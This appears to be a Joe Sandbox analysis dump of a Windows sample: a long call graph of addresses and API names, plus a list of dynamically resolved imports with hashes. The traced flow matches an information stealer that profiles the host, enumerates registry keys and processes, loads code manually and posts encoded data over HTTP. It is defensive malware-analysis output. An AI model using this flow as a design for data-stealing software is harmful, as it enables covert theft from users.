9f1b36 15049->15050 15051 9fa9b0 4 API calls 15050->15051 15052 9f1b4f 15051->15052 15053 9fa8a0 lstrcpy 15052->15053 15054 9f1b58 15053->15054 15055 9fa9b0 4 API calls 15054->15055 15056 9f1b76 15055->15056 15057 9fa8a0 lstrcpy 15056->15057 15058 9f1b7f 15057->15058 15059 9f7500 6 API calls 15058->15059 15060 9f1b96 15059->15060 15061 9fa920 3 API calls 15060->15061 15062 9f1ba9 15061->15062 15063 9fa8a0 lstrcpy 15062->15063 15064 9f1bb2 15063->15064 15065 9fa9b0 4 API calls 15064->15065 15066 9f1bdc 15065->15066 15067 9fa8a0 lstrcpy 15066->15067 15068 9f1be5 15067->15068 15069 9fa9b0 4 API calls 15068->15069 15070 9f1c05 15069->15070 15071 9fa8a0 lstrcpy 15070->15071 15072 9f1c0e 15071->15072 15778 9f7690 GetProcessHeap RtlAllocateHeap 15072->15778 15075 9fa9b0 4 API calls 15076 9f1c2e 15075->15076 15077 9fa8a0 lstrcpy 15076->15077 15078 9f1c37 15077->15078 15079 9fa9b0 4 API calls 15078->15079 15080 9f1c56 15079->15080 15081 9fa8a0 lstrcpy 15080->15081 15082 9f1c5f 15081->15082 15083 9fa9b0 4 API calls 15082->15083 15084 9f1c80 15083->15084 15085 9fa8a0 lstrcpy 15084->15085 15086 9f1c89 15085->15086 15785 9f77c0 GetCurrentProcess IsWow64Process 15086->15785 15089 9fa9b0 4 API calls 15090 9f1ca9 15089->15090 15091 9fa8a0 lstrcpy 15090->15091 15092 9f1cb2 15091->15092 15093 9fa9b0 4 API calls 15092->15093 15094 9f1cd1 15093->15094 15095 9fa8a0 lstrcpy 15094->15095 15096 9f1cda 15095->15096 15097 9fa9b0 4 API calls 15096->15097 15098 9f1cfb 15097->15098 15099 9fa8a0 lstrcpy 15098->15099 15100 9f1d04 15099->15100 15101 9f7850 3 API calls 15100->15101 15102 9f1d14 15101->15102 15103 9fa9b0 4 API calls 15102->15103 15104 9f1d24 15103->15104 15105 9fa8a0 lstrcpy 15104->15105 15106 9f1d2d 15105->15106 15107 9fa9b0 4 API calls 15106->15107 15108 9f1d4c 15107->15108 15109 9fa8a0 lstrcpy 15108->15109 15110 9f1d55 15109->15110 15111 9fa9b0 4 API calls 15110->15111 15112 9f1d75 15111->15112 15113 9fa8a0 lstrcpy 15112->15113 15114 9f1d7e 15113->15114 15115 9f78e0 3 API calls 15114->15115 15116 9f1d8e 15115->15116 15117 9fa9b0 4 API calls 15116->15117 15118 9f1d9e 15117->15118 15119 9fa8a0 lstrcpy 15118->15119 15120 9f1da7 15119->15120 15121 9fa9b0 4 API calls 15120->15121 15122 9f1dc6 15121->15122 15123 9fa8a0 lstrcpy 15122->15123 15124 9f1dcf 15123->15124 15125 9fa9b0 4 API calls 15124->15125 15126 9f1df0 15125->15126 15127 9fa8a0 lstrcpy 15126->15127 15128 9f1df9 15127->15128 15787 9f7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15128->15787 15131 9fa9b0 4 API calls 15132 9f1e19 15131->15132 15133 9fa8a0 lstrcpy 15132->15133 15134 9f1e22 15133->15134 15135 9fa9b0 4 API calls 15134->15135 15136 9f1e41 15135->15136 15137 9fa8a0 lstrcpy 15136->15137 15138 9f1e4a 15137->15138 15139 9fa9b0 4 API calls 15138->15139 15140 9f1e6b 15139->15140 15141 9fa8a0 lstrcpy 15140->15141 15142 9f1e74 15141->15142 15789 9f7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15142->15789 15145 9fa9b0 4 API calls 15146 9f1e94 15145->15146 15147 9fa8a0 lstrcpy 15146->15147 15148 9f1e9d 15147->15148 15149 9fa9b0 4 API calls 15148->15149 15150 9f1ebc 15149->15150 15151 9fa8a0 lstrcpy 15150->15151 15152 9f1ec5 15151->15152 15153 9fa9b0 4 API calls 15152->15153 15154 9f1ee5 15153->15154 15155 9fa8a0 lstrcpy 15154->15155 15156 9f1eee 15155->15156 15792 9f7b00 GetUserDefaultLocaleName 15156->15792 15159 9fa9b0 4 API calls 15160 9f1f0e 15159->15160 15161 9fa8a0 lstrcpy 15160->15161 15162 9f1f17 15161->15162 15163 9fa9b0 4 API calls 15162->15163 15164 9f1f36 15163->15164 15165 9fa8a0 lstrcpy 15164->15165 15166 9f1f3f 15165->15166 15167 9fa9b0 4 API calls 15166->15167 15168 9f1f60 15167->15168 15169 9fa8a0 lstrcpy 15168->15169 15170 9f1f69 15169->15170 15796 9f7b90 15170->15796 15172 9f1f80 15173 9fa920 3 API calls 15172->15173 15174 9f1f93 15173->15174 15175 9fa8a0 lstrcpy 15174->15175 15176 9f1f9c 15175->15176 15177 9fa9b0 4 API calls 15176->15177 15178 9f1fc6 15177->15178 15179 9fa8a0 lstrcpy 15178->15179 15180 9f1fcf 15179->15180 15181 9fa9b0 4 API calls 15180->15181 15182 9f1fef 15181->15182 15183 9fa8a0 lstrcpy 15182->15183 15184 9f1ff8 15183->15184 15808 9f7d80 GetSystemPowerStatus 15184->15808 15187 9fa9b0 4 API calls 15188 9f2018 15187->15188 15189 9fa8a0 lstrcpy 15188->15189 15190 9f2021 15189->15190 15191 9fa9b0 4 API calls 15190->15191 15192 9f2040 15191->15192 15193 9fa8a0 lstrcpy 15192->15193 15194 9f2049 15193->15194 15195 9fa9b0 4 API calls 15194->15195 15196 9f206a 15195->15196 15197 9fa8a0 lstrcpy 15196->15197 15198 9f2073 15197->15198 15199 9f207e GetCurrentProcessId 15198->15199 15810 9f9470 OpenProcess 15199->15810 15202 9fa920 3 API calls 15203 9f20a4 15202->15203 15204 9fa8a0 lstrcpy 15203->15204 15205 9f20ad 15204->15205 15206 9fa9b0 4 API calls 15205->15206 15207 9f20d7 15206->15207 15208 9fa8a0 lstrcpy 15207->15208 15209 9f20e0 15208->15209 15210 9fa9b0 4 API calls 15209->15210 15211 9f2100 15210->15211 15212 9fa8a0 lstrcpy 15211->15212 15213 9f2109 15212->15213 15815 9f7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15213->15815 15216 9fa9b0 4 API calls 15217 9f2129 15216->15217 15218 9fa8a0 lstrcpy 15217->15218 15219 9f2132 15218->15219 15220 9fa9b0 4 API calls 15219->15220 15221 9f2151 15220->15221 15222 9fa8a0 lstrcpy 15221->15222 15223 9f215a 15222->15223 15224 9fa9b0 4 API calls 15223->15224 15225 9f217b 15224->15225 15226 9fa8a0 lstrcpy 15225->15226 15227 9f2184 15226->15227 15819 9f7f60 15227->15819 15230 9fa9b0 4 API calls 15231 9f21a4 15230->15231 15232 9fa8a0 lstrcpy 15231->15232 15233 9f21ad 15232->15233 15234 9fa9b0 4 API calls 15233->15234 15235 9f21cc 15234->15235 15236 9fa8a0 lstrcpy 15235->15236 15237 9f21d5 15236->15237 15238 9fa9b0 4 API calls 15237->15238 15239 9f21f6 15238->15239 15240 9fa8a0 lstrcpy 15239->15240 15241 9f21ff 15240->15241 15832 9f7ed0 GetSystemInfo wsprintfA 15241->15832 15244 9fa9b0 4 API calls 15245 9f221f 15244->15245 15246 9fa8a0 lstrcpy 15245->15246 15247 9f2228 15246->15247 15248 9fa9b0 4 API calls 15247->15248 15249 9f2247 15248->15249 15250 9fa8a0 lstrcpy 15249->15250 15251 9f2250 15250->15251 15252 9fa9b0 4 API calls 15251->15252 15253 9f2270 15252->15253 15254 9fa8a0 lstrcpy 15253->15254 15255 9f2279 15254->15255 15834 9f8100 GetProcessHeap RtlAllocateHeap 15255->15834 15258 9fa9b0 4 API calls 15259 9f2299 15258->15259 15260 9fa8a0 lstrcpy 15259->15260 15261 9f22a2 15260->15261 15262 9fa9b0 4 API calls 15261->15262 15263 9f22c1 15262->15263 15264 9fa8a0 lstrcpy 15263->15264 15265 9f22ca 15264->15265 15266 9fa9b0 4 API calls 15265->15266 15267 9f22eb 15266->15267 15268 9fa8a0 lstrcpy 15267->15268 15269 9f22f4 15268->15269 15840 9f87c0 15269->15840 15272 9fa920 3 API calls 15273 9f231e 15272->15273 15274 9fa8a0 lstrcpy 15273->15274 15275 9f2327 15274->15275 15276 9fa9b0 4 API calls 15275->15276 15277 9f2351 15276->15277 15278 9fa8a0 lstrcpy 15277->15278 15279 9f235a 15278->15279 15280 9fa9b0 4 API calls 15279->15280 15281 9f237a 15280->15281 15282 9fa8a0 lstrcpy 15281->15282 15283 9f2383 15282->15283 15284 9fa9b0 4 API calls 15283->15284 15285 9f23a2 15284->15285 15286 9fa8a0 lstrcpy 15285->15286 15287 9f23ab 15286->15287 15845 9f81f0 15287->15845 15289 9f23c2 15290 9fa920 3 API calls 15289->15290 15291 9f23d5 15290->15291 15292 9fa8a0 lstrcpy 15291->15292 15293 9f23de 15292->15293 15294 9fa9b0 4 API calls 15293->15294 15295 9f240a 15294->15295 15296 9fa8a0 lstrcpy 15295->15296 15297 9f2413 15296->15297 15298 9fa9b0 4 API calls 15297->15298 15299 9f2432 15298->15299 15300 9fa8a0 lstrcpy 15299->15300 15301 9f243b 15300->15301 15302 9fa9b0 4 API calls 15301->15302 15303 9f245c 15302->15303 15304 9fa8a0 lstrcpy 15303->15304 15305 9f2465 15304->15305 15306 9fa9b0 4 API calls 15305->15306 15307 9f2484 15306->15307 15308 9fa8a0 lstrcpy 15307->15308 15309 9f248d 15308->15309 15310 9fa9b0 4 API calls 15309->15310 15311 9f24ae 15310->15311 15312 9fa8a0 lstrcpy 15311->15312 15313 9f24b7 15312->15313 15853 9f8320 15313->15853 15315 9f24d3 15316 9fa920 3 API calls 15315->15316 15317 9f24e6 15316->15317 15318 9fa8a0 lstrcpy 15317->15318 15319 9f24ef 15318->15319 15320 9fa9b0 4 API calls 15319->15320 15321 9f2519 15320->15321 15322 9fa8a0 lstrcpy 15321->15322 15323 9f2522 15322->15323 15324 9fa9b0 4 API calls 15323->15324 15325 9f2543 15324->15325 15326 9fa8a0 lstrcpy 15325->15326 15327 9f254c 15326->15327 15328 9f8320 17 API calls 15327->15328 15329 9f2568 15328->15329 15330 9fa920 3 API calls 15329->15330 15331 9f257b 15330->15331 15332 9fa8a0 lstrcpy 15331->15332 15333 9f2584 15332->15333 15334 9fa9b0 4 API calls 15333->15334 15335 9f25ae 15334->15335 15336 9fa8a0 lstrcpy 15335->15336 15337 9f25b7 15336->15337 15338 9fa9b0 4 API calls 15337->15338 15339 9f25d6 15338->15339 15340 9fa8a0 lstrcpy 15339->15340 15341 9f25df 15340->15341 15342 9fa9b0 4 API calls 15341->15342 15343 9f2600 15342->15343 15344 9fa8a0 lstrcpy 15343->15344 15345 9f2609 15344->15345 15889 9f8680 15345->15889 15347 9f2620 15348 9fa920 3 API calls 15347->15348 15349 9f2633 15348->15349 15350 9fa8a0 lstrcpy 15349->15350 15351 9f263c 15350->15351 15352 9f265a lstrlen 15351->15352 15353 9f266a 15352->15353 15354 9fa740 lstrcpy 15353->15354 15355 9f267c 15354->15355 15356 9e1590 lstrcpy 15355->15356 15357 9f268d 15356->15357 15899 9f5190 15357->15899 15359 9f2699 15359->13791 16087 9faad0 15360->16087 15362 9e5009 InternetOpenUrlA 15363 9e5021 15362->15363 15364 9e502a InternetReadFile 15363->15364 15365 9e50a0 InternetCloseHandle InternetCloseHandle 15363->15365 15364->15363 15366 9e50ec 15365->15366 15366->13795 16088 9e98d0 15367->16088 15369 9f0759 15370 9f077d 15369->15370 15371 9f0a38 15369->15371 15373 9f0799 StrCmpCA 15370->15373 15372 9e1590 lstrcpy 15371->15372 15374 9f0a49 15372->15374 15375 9f0843 15373->15375 15376 9f07a8 15373->15376 16264 9f0250 15374->16264 15381 9f0865 StrCmpCA 15375->15381 15378 9fa7a0 lstrcpy 15376->15378 15380 9f07c3 15378->15380 15383 9e1590 lstrcpy 15380->15383 15382 9f0874 15381->15382 15419 9f096b 15381->15419 15384 9fa740 lstrcpy 15382->15384 15385 9f080c 15383->15385 15387 9f0881 15384->15387 15388 9fa7a0 lstrcpy 15385->15388 15386 9f099c StrCmpCA 15389 9f09ab 15386->15389 15390 9f0a2d 15386->15390 15391 9fa9b0 4 API calls 15387->15391 15392 9f0823 15388->15392 15393 9e1590 lstrcpy 15389->15393 15390->13799 15394 9f08ac 15391->15394 15395 9fa7a0 lstrcpy 15392->15395 15396 9f09f4 15393->15396 15397 9fa920 3 API calls 15394->15397 15398 9f083e 15395->15398 15399 9fa7a0 lstrcpy 15396->15399 15400 9f08b3 15397->15400 16091 9efb00 15398->16091 15402 9f0a0d 15399->15402 15403 9fa9b0 4 API calls 15400->15403 15404 9fa7a0 lstrcpy 15402->15404 15405 9f08ba 15403->15405 15406 9f0a28 15404->15406 15419->15386 15739 9fa7a0 lstrcpy 15738->15739 15740 9e1683 15739->15740 15741 9fa7a0 lstrcpy 15740->15741 15742 9e1695 15741->15742 15743 9fa7a0 lstrcpy 15742->15743 15744 9e16a7 15743->15744 15745 9fa7a0 lstrcpy 15744->15745 15746 9e15a3 15745->15746 15746->14622 15748 9e47c6 15747->15748 15749 9e4838 lstrlen 15748->15749 15773 9faad0 15749->15773 15751 9e4848 InternetCrackUrlA 15752 9e4867 15751->15752 15752->14699 15754 9fa740 lstrcpy 15753->15754 15755 9f8b74 15754->15755 15756 9fa740 lstrcpy 15755->15756 15757 9f8b82 GetSystemTime 15756->15757 15759 9f8b99 15757->15759 15758 9fa7a0 lstrcpy 15760 9f8bfc 15758->15760 15759->15758 15760->14714 15763 9fa931 15761->15763 15762 9fa988 15764 9fa7a0 lstrcpy 15762->15764 15763->15762 15765 9fa968 lstrcpy lstrcat 15763->15765 15766 9fa994 15764->15766 15765->15762 15766->14717 15767->14832 15769 9e4eee 15768->15769 15770 9e9af9 LocalAlloc 15768->15770 15769->14720 15769->14722 15770->15769 15771 9e9b14 CryptStringToBinaryA 15770->15771 15771->15769 15772 9e9b39 LocalFree 15771->15772 15772->15769 15773->15751 15774->14842 15775->14983 15776->14985 15777->14993 15906 9f77a0 15778->15906 15781 9f76c6 RegOpenKeyExA 15783 9f76e7 RegQueryValueExA 15781->15783 15784 9f7704 RegCloseKey 15781->15784 15782 9f1c1e 15782->15075 15783->15784 15784->15782 15786 9f1c99 15785->15786 15786->15089 15788 9f1e09 15787->15788 15788->15131 15790 9f7a9a wsprintfA 15789->15790 15791 9f1e84 15789->15791 15790->15791 15791->15145 15793 9f7b4d 15792->15793 15794 9f1efe 15792->15794 15913 9f8d20 LocalAlloc CharToOemW 15793->15913 15794->15159 15797 9fa740 lstrcpy 15796->15797 15798 9f7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15797->15798 15805 9f7c25 15798->15805 15799 9f7d18 15801 9f7d1e LocalFree 15799->15801 15802 9f7d28 15799->15802 15800 9f7c46 GetLocaleInfoA 15800->15805 15801->15802 15804 9fa7a0 lstrcpy 15802->15804 15803 9fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15803->15805 15806 9f7d37 15804->15806 15805->15799 15805->15800 15805->15803 15807 9fa8a0 lstrcpy 15805->15807 15806->15172 15807->15805 15809 9f2008 15808->15809 15809->15187 15811 9f94b5 15810->15811 15812 9f9493 GetModuleFileNameExA CloseHandle 15810->15812 15813 9fa740 lstrcpy 15811->15813 15812->15811 15814 9f2091 15813->15814 15814->15202 15816 9f7e68 RegQueryValueExA 15815->15816 15818 9f2119 15815->15818 15817 9f7e8e RegCloseKey 15816->15817 15817->15818 15818->15216 15820 9f7fb9 GetLogicalProcessorInformationEx 15819->15820 15821 9f7fd8 GetLastError 15820->15821 15826 9f8029 15820->15826 15822 9f8022 15821->15822 15831 9f7fe3 15821->15831 15823 9f2194 15822->15823 15827 9f89f0 2 API calls 15822->15827 15823->15230 15828 9f89f0 2 API calls 15826->15828 15827->15823 15829 9f807b 15828->15829 15829->15822 15830 9f8084 wsprintfA 15829->15830 15830->15823 15831->15820 15831->15823 15914 9f89f0 15831->15914 15917 9f8a10 GetProcessHeap RtlAllocateHeap 15831->15917 15833 9f220f 15832->15833 15833->15244 15835 9f89b0 15834->15835 15836 9f814d GlobalMemoryStatusEx 15835->15836 15837 9f8163 __aulldiv 15836->15837 15838 9f819b wsprintfA 15837->15838 15839 9f2289 15838->15839 15839->15258 15841 9f87fb GetProcessHeap RtlAllocateHeap wsprintfA 15840->15841 15843 9fa740 lstrcpy 15841->15843 15844 9f230b 15843->15844 15844->15272 15846 9fa740 lstrcpy 15845->15846 15850 9f8229 15846->15850 15847 9f8263 15849 9fa7a0 lstrcpy 15847->15849 15848 9fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15848->15850 15851 9f82dc 15849->15851 15850->15847 15850->15848 15852 9fa8a0 lstrcpy 15850->15852 15851->15289 15852->15850 15854 9fa740 lstrcpy 15853->15854 15855 9f835c RegOpenKeyExA 15854->15855 15856 9f83ae 15855->15856 15857 9f83d0 15855->15857 15858 9fa7a0 lstrcpy 15856->15858 15859 9f83f8 RegEnumKeyExA 15857->15859 15860 9f8613 RegCloseKey 15857->15860 15870 9f83bd 15858->15870 15862 9f843f wsprintfA RegOpenKeyExA 15859->15862 15863 9f860e 15859->15863 15861 9fa7a0 lstrcpy 15860->15861 15861->15870 15864 9f8485 RegCloseKey RegCloseKey 15862->15864 15865 9f84c1 RegQueryValueExA 15862->15865 15863->15860 15866 9fa7a0 lstrcpy 15864->15866 15867 9f84fa lstrlen 15865->15867 15868 9f8601 RegCloseKey 15865->15868 15866->15870 15867->15868 15869 9f8510 15867->15869 15868->15863 15871 9fa9b0 4 API calls 15869->15871 15870->15315 15872 9f8527 15871->15872 15873 9fa8a0 lstrcpy 15872->15873 15874 9f8533 15873->15874 15875 9fa9b0 4 API calls 15874->15875 15876 9f8557 15875->15876 15877 9fa8a0 lstrcpy 15876->15877 15878 9f8563 15877->15878 15879 9f856e RegQueryValueExA 15878->15879 15879->15868 15880 9f85a3 15879->15880 15881 9fa9b0 4 API calls 15880->15881 15882 9f85ba 15881->15882 15883 9fa8a0 lstrcpy 15882->15883 15884 9f85c6 15883->15884 15885 9fa9b0 4 API calls 15884->15885 15886 9f85ea 15885->15886 15887 9fa8a0 lstrcpy 15886->15887 15888 9f85f6 15887->15888 15888->15868 15890 9fa740 lstrcpy 15889->15890 15891 9f86bc CreateToolhelp32Snapshot Process32First 15890->15891 15892 9f875d CloseHandle 15891->15892 15893 9f86e8 Process32Next 15891->15893 15894 9fa7a0 lstrcpy 15892->15894 15893->15892 15898 9f86fd 15893->15898 15897 9f8776 15894->15897 15895 9fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15895->15898 15896 9fa8a0 lstrcpy 15896->15898 15897->15347 15898->15893 15898->15895 15898->15896 15900 9fa7a0 lstrcpy 15899->15900 15901 9f51b5 15900->15901 15902 9e1590 lstrcpy 15901->15902 15903 9f51c6 15902->15903 15918 9e5100 15903->15918 15905 9f51cf 15905->15359 15909 9f7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15906->15909 15908 9f76b9 15908->15781 15908->15782 15910 9f7765 RegQueryValueExA 15909->15910 15911 9f7780 RegCloseKey 15909->15911 15910->15911 15912 9f7793 15911->15912 15912->15908 15913->15794 15915 9f8a0c 15914->15915 15916 9f89f9 GetProcessHeap HeapFree 15914->15916 15915->15831 15916->15915 15917->15831 15919 9fa7a0 lstrcpy 15918->15919 15920 9e5119 15919->15920 15921 9e47b0 2 API calls 15920->15921 15922 9e5125 15921->15922 16078 9f8ea0 15922->16078 15924 9e5184 15925 9e5192 lstrlen 15924->15925 15926 9e51a5 15925->15926 15927 9f8ea0 4 API calls 15926->15927 15928 9e51b6 15927->15928 15929 9fa740 lstrcpy 15928->15929 15930 9e51c9 15929->15930 15931 9fa740 lstrcpy 15930->15931 15932 9e51d6 15931->15932 15933 9fa740 lstrcpy 15932->15933 15934 9e51e3 15933->15934 15935 9fa740 lstrcpy 15934->15935 15936 9e51f0 15935->15936 15937 9fa740 lstrcpy 15936->15937 15938 9e51fd InternetOpenA StrCmpCA 15937->15938 15939 9e522f 15938->15939 15940 9e58c4 InternetCloseHandle 15939->15940 15941 9f8b60 3 API calls 15939->15941 15947 9e58d9 ctype 15940->15947 15942 9e524e 15941->15942 15943 9fa920 3 API calls 15942->15943 15944 9e5261 15943->15944 15945 9fa8a0 lstrcpy 15944->15945 15946 9e526a 15945->15946 15948 9fa9b0 4 API calls 15946->15948 15950 9fa7a0 lstrcpy 15947->15950 15949 9e52ab 15948->15949 15951 9fa920 3 API calls 15949->15951 15959 9e5913 15950->15959 15952 9e52b2 15951->15952 15953 9fa9b0 4 API calls 15952->15953 15954 9e52b9 15953->15954 15955 9fa8a0 lstrcpy 15954->15955 15956 9e52c2 15955->15956 15957 9fa9b0 4 API calls 15956->15957 15958 9e5303 15957->15958 15960 9fa920 3 API calls 15958->15960 15959->15905 15961 9e530a 15960->15961 15962 9fa8a0 lstrcpy 15961->15962 15963 9e5313 15962->15963 15964 9e5329 InternetConnectA 15963->15964 15964->15940 15965 9e5359 HttpOpenRequestA 15964->15965 15967 9e58b7 InternetCloseHandle 15965->15967 15968 9e53b7 15965->15968 15967->15940 15969 9fa9b0 4 API calls 15968->15969 15970 9e53cb 15969->15970 15971 9fa8a0 lstrcpy 15970->15971 15972 9e53d4 15971->15972 15973 9fa920 3 API calls 15972->15973 15974 9e53f2 15973->15974 15975 9fa8a0 lstrcpy 15974->15975 15976 9e53fb 15975->15976 15977 9fa9b0 4 API calls 15976->15977 15978 9e541a 15977->15978 15979 9fa8a0 lstrcpy 15978->15979 15980 9e5423 15979->15980 15981 9fa9b0 4 API calls 15980->15981 15982 9e5444 15981->15982 15983 9fa8a0 lstrcpy 15982->15983 15984 9e544d 15983->15984 15985 9fa9b0 4 API calls 15984->15985 15986 9e546e 15985->15986 15987 9fa8a0 lstrcpy 15986->15987 16079 9f8ead CryptBinaryToStringA 16078->16079 16083 9f8ea9 16078->16083 16080 9f8ece GetProcessHeap RtlAllocateHeap 16079->16080 16079->16083 16081 9f8ef4 ctype 16080->16081 16080->16083 16082 9f8f05 CryptBinaryToStringA 16081->16082 16082->16083 16083->15924 16087->15362 16330 9e9880 16088->16330 16090 9e98e1 16090->15369 16092 9fa740 lstrcpy 16091->16092 16093 9efb16 16092->16093 16265 9fa740 lstrcpy 16264->16265 16266 9f0266 16265->16266 16267 9f8de0 2 API calls 16266->16267 16268 9f027b 16267->16268 16269 9fa920 3 API calls 16268->16269 16270 9f028b 16269->16270 16271 9fa8a0 lstrcpy 16270->16271 16272 9f0294 16271->16272 16273 9fa9b0 4 API calls 16272->16273 16274 9f02b8 16273->16274 16331 9e988d 16330->16331 16334 9e6fb0 16331->16334 16333 9e98ad ctype 16333->16090 16337 9e6d40 16334->16337 16338 9e6d63 16337->16338 16352 9e6d59 16337->16352 16353 9e6530 16338->16353 16342 9e6dbe 16342->16352 16363 9e69b0 16342->16363 16344 9e6e2a 16345 9e6ee6 VirtualFree 16344->16345 16347 9e6ef7 16344->16347 16344->16352 16345->16347 16346 9e6f41 16350 9f89f0 2 API calls 16346->16350 16346->16352 16347->16346 16348 9e6f38 16347->16348 16349 9e6f26 FreeLibrary 16347->16349 16351 9f89f0 2 API calls 16348->16351 16349->16347 16350->16352 16351->16346 16352->16333 16354 9e6542 16353->16354 16356 9e6549 16354->16356 16373 9f8a10 GetProcessHeap RtlAllocateHeap 16354->16373 16356->16352 16357 9e6660 16356->16357 16362 9e668f VirtualAlloc 16357->16362 16359 9e6730 16360 9e673c 16359->16360 16361 9e6743 VirtualAlloc 16359->16361 16360->16342 16361->16360 16362->16359 16362->16360 16364 9e69c9 16363->16364 16368 9e69d5 16363->16368 16365 9e6a09 LoadLibraryA 16364->16365 16364->16368 16366 9e6a32 16365->16366 16365->16368 16370 9e6ae0 16366->16370 16374 9f8a10 GetProcessHeap RtlAllocateHeap 16366->16374 16368->16344 16369 9e6ba8 GetProcAddress 16369->16368 16369->16370 16370->16368 16370->16369 16371 9f89f0 2 API calls 16371->16370 16372 9e6a8b 16372->16368 16372->16371 16373->16356 16374->16372

                              Executed Functions

                              Function 009F9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 9f9860-9f9874 call 9f9750 663 9f987a-9f9a8e call 9f9780 GetProcAddress * 21 660->663 664 9f9a93-9f9af2 LoadLibraryA * 5 660->664 663->664 666 9f9b0d-9f9b14 664->666 667 9f9af4-9f9b08 GetProcAddress 664->667 669 9f9b46-9f9b4d 666->669 670 9f9b16-9f9b41 GetProcAddress * 2 666->670 667->666 671 9f9b4f-9f9b63 GetProcAddress 669->671 672 9f9b68-9f9b6f 669->672 670->669 671->672 673 9f9b89-9f9b90 672->673 674 9f9b71-9f9b84 GetProcAddress 672->674 675 9f9b92-9f9bbc GetProcAddress * 2 673->675 676 9f9bc1-9f9bc2 673->676 674->673 675->676
                              APIs
                              • GetProcAddress.KERNEL32(75900000,013B0768), ref: 009F98A1
                              • GetProcAddress.KERNEL32(75900000,013B0798), ref: 009F98BA
                              • GetProcAddress.KERNEL32(75900000,013B07C8), ref: 009F98D2
                              • GetProcAddress.KERNEL32(75900000,013B07E0), ref: 009F98EA
                              • GetProcAddress.KERNEL32(75900000,013B0648), ref: 009F9903
                              • GetProcAddress.KERNEL32(75900000,013B8870), ref: 009F991B
                              • GetProcAddress.KERNEL32(75900000,013A6400), ref: 009F9933
                              • GetProcAddress.KERNEL32(75900000,013A6380), ref: 009F994C
                              • GetProcAddress.KERNEL32(75900000,013B06C0), ref: 009F9964
                              • GetProcAddress.KERNEL32(75900000,013B0780), ref: 009F997C
                              • GetProcAddress.KERNEL32(75900000,013B0708), ref: 009F9995
                              • GetProcAddress.KERNEL32(75900000,013B07B0), ref: 009F99AD
                              • GetProcAddress.KERNEL32(75900000,013A65E0), ref: 009F99C5
                              • GetProcAddress.KERNEL32(75900000,013B0738), ref: 009F99DE
                              • GetProcAddress.KERNEL32(75900000,013B07F8), ref: 009F99F6
                              • GetProcAddress.KERNEL32(75900000,013A6420), ref: 009F9A0E
                              • GetProcAddress.KERNEL32(75900000,013B0828), ref: 009F9A27
                              • GetProcAddress.KERNEL32(75900000,013B08A0), ref: 009F9A3F
                              • GetProcAddress.KERNEL32(75900000,013A6500), ref: 009F9A57
                              • GetProcAddress.KERNEL32(75900000,013B08B8), ref: 009F9A70
                              • GetProcAddress.KERNEL32(75900000,013A6360), ref: 009F9A88
                              • LoadLibraryA.KERNEL32(013B0858,?,009F6A00), ref: 009F9A9A
                              • LoadLibraryA.KERNEL32(013B08D0,?,009F6A00), ref: 009F9AAB
                              • LoadLibraryA.KERNEL32(013B0900,?,009F6A00), ref: 009F9ABD
                              • LoadLibraryA.KERNEL32(013B08E8,?,009F6A00), ref: 009F9ACF
                              • LoadLibraryA.KERNEL32(013B0918,?,009F6A00), ref: 009F9AE0
                              • GetProcAddress.KERNEL32(75070000,013B0870), ref: 009F9B02
                              • GetProcAddress.KERNEL32(75FD0000,013B0888), ref: 009F9B23
                              • GetProcAddress.KERNEL32(75FD0000,013B8C40), ref: 009F9B3B
                              • GetProcAddress.KERNEL32(75A50000,013B8E98), ref: 009F9B5D
                              • GetProcAddress.KERNEL32(74E50000,013A6440), ref: 009F9B7E
                              • GetProcAddress.KERNEL32(76E80000,013B88A0), ref: 009F9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 009F9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 009F9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 0cdefd4d35e3b568ba6839327a9d06ee1c690a5f7ece731003a1d36b44bc0977
                              • Instruction ID: ca7fe1a27d1157bd71ce30ce4e8c4502e7d78374f45b5b771a8e6c8d08cf7256
                              • Opcode Fuzzy Hash: 0cdefd4d35e3b568ba6839327a9d06ee1c690a5f7ece731003a1d36b44bc0977
